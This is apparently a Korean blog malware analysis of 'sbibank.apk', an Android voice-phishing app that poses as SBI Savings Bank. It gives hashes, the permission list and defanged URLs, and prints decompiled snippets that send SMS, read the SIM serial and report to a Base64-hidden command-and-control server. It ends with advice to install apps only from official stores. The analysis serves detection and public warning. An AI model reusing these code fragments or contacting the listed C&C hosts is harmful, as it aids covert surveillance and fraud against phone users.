오늘은 SBI 저축은행으로 속이는 보이스피싱 앱인 sbibank.apk(2021.3.28)에 대해 분석을 하는 시간을 가져 보겠습니다.
감염이 되는 경로는 다음과 같습니다.
hxxp://154.23.55(.)21/sbi/ -> hxxp://154.23.55(.)21/sbi/sbibank(.)apk 입니다.
해쉬값은 다음과 같습니다.
파일명: sbibank.apk
사이즈:9,161,476 Bytes
작성일시: 2021-03-25 22:07:31 (+09:00)
수정일시: 2021-03-25 22:06:57 (+09:00)
접근일시: 2021-03-25 22:07:31 (+09:00)
CRC32: 49c19d9a
MD5:5cc6733864fc69a545be3aa44316a122
SHA-1:09e06bca19b8a7f266502cc53366ae6d0e6f5475
SHA-256:546f93d93d47c422b3193864c872a64f87fabd1dab845eecbf68195c41d35207
악성코드 이름과 패키지 이름은 다음과 같습니다.
app_name: 바빌론
package_name:net.threetensix3.tek.views20210323
입니다. 그리고 악성코드 권한은 다음과 같이 총 21개로 이루어져 있습니다.
android.permission.CALL_PHONE
android.permission.READ_PHONE_STATE
android.permission.SYSTEM_ALERT_WINDOW
android.permission.WAKE_LOCK
android.permission.DISABLE_KEYGUARD
android.permission.READ_PHONE_NUMBERS
android.permission.READ_CALL_LOG
android.permission.READ_CONTACTS
android.permission.WRITE_CONTACTS
android.permission.RECORD_AUDIO
android.permission.MODIFY_AUDIO_SETTINGS
android.permission.ACCESS_FINE_LOCATION
android.permission.RECEIVE_USER_PRESENT
android.permission.INTERNET
android.permission.PROCESS_OUTGOING_CALLS
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.WRITE_CALL_LOG
android.permission.ANSWER_PHONE_CALLS
android.permission.READ_SMS
android.permission.CAMERA
android.hardware.camera
android.hardware.camera.autofocus
android.permission.FOREGROUND_SERVICE
android.permission.GET_TASKS
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.REORDER_TASKS
android.hardware.telephony
android.permission.SYSTEM_ALERT_WINDOW
android.permission.READ_EXTERNAL_STORAGE
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.ACCESS_NETWORK_STATE
android.permission.ACCESS_WIFI_STATE
android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
android.permission.FLASHLIGHT
일단 악성코드 권한을 보면 음성녹음, 연락처 접근해서 읽고 쓰기, 카메라 작동, 전화번호 읽고 쓰기, 외장 디스크 접근 및 읽고 쓰고 와이파이 접근 등이 보이는 것을 볼 수가 있으면 해당 악성코드가 설치되면 그냥 스마트폰 권한을 한방에 다 넘어가는 구조로 되어 있고 그리고 당연히 경찰, 은행 등으로 지원을 받고 싶어서 전화번호를 입력해서 전화를 걸어도 당연히 스마트폰 권한은 이미 넘어갔기 때문에 전화금융사기 일당으로 전화가 연결되는 것이 당연합니다.
그리고 net.threetensix3. tek.tools.k 부분에서는 다음과 같이 스마트폰에 있는 문자에 접근하는 코드가 있는 것을 볼 수가 있습니다.
public static boolean b(String paramString1, String paramString2) {
try {
SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, null, null);
return true;
} catch (Exception exception) {
exception.printStackTrace();
return false;
}
}
}
com.umeng.commonsdk.internal.utils.k 에서는 iccid,imemi 정보를 획득하기 위한 코드들도 보이는 것을 확인할 수가 있습니다.
public static String b(Context paramContext) {
String str2 = null;
String str1 = str2;
if (paramContext != null) {
str1 = str2;
if (UMUtils.checkPermission(paramContext, "android.permission.READ_PHONE_STATE")) {
TelephonyManager telephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (telephonyManager == null)
return null;
str1 = telephonyManager.getSimSerialNumber();
}
}
return str1;
}그리고 간단하게 Bytecode-Viewer를 통해서 url(인터넷 주소)를 확인을 해 보면 다음과 같이 들어가 져 있습니다.
뭐 중국어가 들어가 져 있는 것도 볼 수가 있습니다.
예를 들어서 다음과 같습니다.
发送数据时发生:데이터를 보낼 때 발생
异常,导致友盟后端域名解析失败。请检查系统DNS服务器配置是否正确。详见链接: 예외로 말미암아 Umeng 백엔드 도메인 이름 확인이 실패했습니다. 시스템 DNS 서버 구성이 올바른지 확인하십시오. 자세한 내용은 링크를 참조하십시오.
统计SDK常见问题索引贴 详见链接:Statistics SDK FAQ Index Post 자세한 내용은 링크 참조
등과 중국어가 들어가 져 있는것을 볼 수가 있으면 앞서 피싱 사이트 국기를 보면 홍콩인 것을 확인할 수가 있습니다. 대충 중국에서 만들어진 것이 아닐까. 라는 추측할 수가 있는 부분입니다.
그리고 해당 악성코드에 포함된 URL은 다음과 같습니다.
hxxp://a6190c13118f4cf2846e787fc492c0a6@103(.)93.79.32:9000/8
hxxps://developer(.)umeng.com/docs/66632/detail
hxxps://cmnsguider(.)yunos.com:443/genDeviceToken
hXXps://ulogs(.)umeng.com/unify_logs
hxxps://mozilla(.)org/MPL/2.0/
hxxs://alogsus(.)umeng.com/unify_logs
hxxps://ouplog(.)umeng.com",
hxxp://schemas(.)android.com/apk/res-auto
hxxps://alogus(.)umeng.com/unify_logs
hxxp://schemas(.)android.com/apk/res/android
4RR(.)WRS/Wn
vnd(.)android.cursor.item/phone_v2
hxxps://plbslog(.)umeng.com
hxxps://ulogs(.)umengcloud.com/unify_logs
vnd(.)android.cursor.item/name
hxxp://ns(.)adobe.com/xap/1.0
hxxps://publicsuffix(.)org/list/public_suffix_list.dat
입니다.
net.threetensix3.tek.tools.NetStateChangeReceiver 부분에서 악성코드 트래픽을 암호화해서 보내는 것을 볼 수가 있습니다.
public void onReceive(Context paramContext, Intent paramIntent) {
if (paramIntent != null && paramIntent.getAction() != null && "android.net.conn.CONNECTIVITY_CHANGE".equals(paramIntent.getAction())) {
n n1 = o.b(paramContext);
b(n1);
SharedPreferences sharedPreferences = paramContext.getSharedPreferences("networkType", 0);
if (!n1.equals("") && !sharedPreferences.getString("networkType", "").equals(n1)) {
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.append(new String(Base64.decode("aHR0cDovLzEwMy4xNTkuODAuODU=", 2)));
stringBuilder.append(":");
stringBuilder.append("8779");
stringBuilder.append("/api/signal/");
stringBuilder.append(d.b.a.a.a.a);
stringBuilder.append("/");
stringBuilder.append(n1.toString());
stringBuilder.append("/");
a(stringBuilder.toString());
SharedPreferences.Editor editor = sharedPreferences.edit();
editor.putString("networkType", n1.toString());
editor.commit();
}
} 여기서 aHR0cDovLzEwMy4xNTkuODAuODU 이라는 것이 보일 것인데 이것이 연결되면 hxxp://103(.)159.80.95 즉 C&C server(C&C 서버)로 연결이 되는 것을 확인할 수가 있습니다. 일단 이런 악성코드에 감염되기 싫은 분들은 일단 기본적으로 주소를 잘 보면 숫자로 돼 있으면 100% 피싱 사이트 라고 생각을 하시면 될 것이면 이런 것을 예방하기 위해서 공식 스토어 이외에 앱을 설치를 하지 말고 스마트폰에서 외부에서 앱을 설치를 하려고 하면 분명히 경고합니다.
그 경고 무시 하시 하는 행동을 하시면 안 됩니다. 그리고 공식력 있는 V3,Eset 같은 백신앱을 설치를 해서 안전하게 스마트폰을 사용하시길 바랍니다. 일단 2021.03.25 23:03 KST 기준을 탐지가 안 되는 V3에 AhnRpt 통해서 해당 악성코드를 신고해 두었습니다. 일단 조만간에 업데이트가 되어서 탐지가 될 것이며 그리고 항상 공식 스토어를 이용을 하고 다른 곳 즉 외부에서는 앱을 다운로드 및 설치를 하는 것을 하지 말아야 합니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| Have I Been Pwned 유출 된 Facebook 전화 번호 검색 방법 (2) | 2021.04.09 |
|---|---|
| 페이스북 계정 개인정보 유출유무 확인 방법 (4) | 2021.04.06 |
| 보이스피싱 악성코드-혼자만봐.apk(2021.03.31) (6) | 2021.04.02 |
| 윈도우 10 KB5000842 누적 업데이트로 인한 프리징 현상 해결 업데이트 (2) | 2021.04.01 |
| 파이어폭스 87.0 보안 업데이트 (0) | 2021.03.25 |
| 안랩 V3 랜섬웨어 보호폴더 설정 방법 (8) | 2021.03.24 |
| 윈도우 10 프린터 인쇄 문제를 해결을 위한 두번쨰 KB5001649 업데이트 (2) | 2021.03.20 |
| Malwarebytes Windows Firewall Control(멀웨어바이츠 윈도우 방화벽 컨트롤)느낌표 로 표시 될떄 해결 방법 (8) | 2021.03.15 |
